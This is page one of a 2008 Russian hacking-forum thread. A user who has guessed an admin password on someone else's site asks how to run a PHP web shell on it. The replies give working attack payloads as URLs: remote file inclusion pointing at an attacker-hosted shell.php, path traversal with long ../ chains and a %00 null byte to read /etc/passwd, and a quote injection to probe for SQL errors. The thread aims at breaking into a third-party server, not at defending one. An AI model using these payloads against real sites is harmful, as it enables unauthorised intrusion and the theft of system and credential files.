Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   PHP includ Как выполнить шелл? (https://forum.antichat.xyz/showthread.php?t=58664)

Nicca 15.01.2008 00:50
PHP includ Как выполнить шелл?
 
Подскажите как залить шел:
Подобрал пароль к админке. Там есть приблизительно такой вызов скрипта:
http://www.hacksite.com/index.php?id?page=user024.php

Я сделал так:
http://www.hacksite.com/index.php?id&page=http://www.site.com/shell.php

Как теперь сделать чтобы у меня был доступ к файлам атакуемого сервера? А то я вижу только свой сервер, свои файлы?

xXvladXx 15.01.2008 00:56
Цитата:
Сообщение от Nicca
Я сделал так:
http://www.hacksite.com/index.php?id&page=http://www.site.com/shell.php
если так не получилось может быть это локальный инклюд... попробуй залить шелл и потом его про инклюдить...

blackybr 15.01.2008 00:59
xXvladXx бред, читай что тс написал

Nicca на каком хосте находится твой шелл.. это раз, второе - не в фрейме опенится ссыль?

FraiDex 15.01.2008 01:10
Цитата:
Сообщение от xXvladXx
если так не получилось может быть это локальный инклюд... попробуй залить шелл и потом его про инклюдить...
чел, ты хоть сам понял что написал? если ты зальёшь шелл, нахрена его потом инклудить?

Nicca 15.01.2008 01:15
Цитата:
Сообщение от blackybr
xXvladXx бред, читай что тс написал

Nicca на каком хосте находится твой шелл.. это раз, второе - не в фрейме опенится ссыль?
1. .freehostia.com

2.Опенится во фрейме!

halkfild 15.01.2008 01:18
Цитата:
Сообщение от FraiDex
чел, ты хоть сам понял что написал? если ты зальёшь шелл шелл, нахрена его потом инклудить?
если ты зальешь шелл просто как файл /*без права на исполнение: картинка, видео, текст.. а потом локально инклюдить*/

но у тс скорее всего просто ифрейм.. /*судя по тому, что он видит файлы того сервера, где залит шелл*/
тс, попробуй проинклюдить /еtc/passwd или что-то другое не доступное через ифрейм

*добавлено

если ифрем, то это не инклуд))) ищи другие баги или попробуй через заливку /*картинок, банеров, темплейтов и других фалов*/, попробуй редактирование страниц, тепмлейтов

blackybr 15.01.2008 01:18
если во фрейме, то ничего не поделаешь. скорее всего просто открывается

<frame src="http://shell.com/shell.php">

Nicca 15.01.2008 01:27
Как исккать /еtc/passwd?
к UsrPage= Добавлять ../etc/passwd ?
Как я тогда его увижу? Сдесь не выводятся\ сообщения об ошибках пробовал:
UsrPage= .sfsd.f2r2 выводит страницу по дефолту. Ошибки нет.
Если я наткнусь на /etc/passwd то выведит ли мне его на страницу?

Tigger 15.01.2008 17:58
Что вы вообще такое говрите))? У меня была ткая же фигня..твой хость скорее всего поодерживает php, поэтому и не выполняется...нужен хост, где нету php...например: www.nm.ru
А что бы читать содержимое надо сделать так)):
http://www.hacksite.com/index.php?id&page=../etc/passwd
И потом побольше ../ не бойся с ними переборжить...этоне страшно..то ест запрос будет выглядеть так:
http://www.hacksite.com/index.php?id&page=../../../../../../../../../../../../../../../etc/passwd
Если есть ошибка и там написано например: ошибка иинкюда ../../../../../../../../../../../../../../../etc/passwd.php
То надо просто после passwd поставить %00
То есть вот так http://www.hacksite.com/index.php?id&page=../../../../../../../../../../../../../../../etc/passwd
Если написана просто ошибка, то возможно надо больше ../
А если и это не поможт, значит инклюд невозможен

heks 15.01.2008 18:11
да вожможно у него там даже нет ни какого инклуда попробуй подставить ковычку после http://www.hacksite.com/index.php?id&page=' и посмотри что у тебя получится


Время: 01:19
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице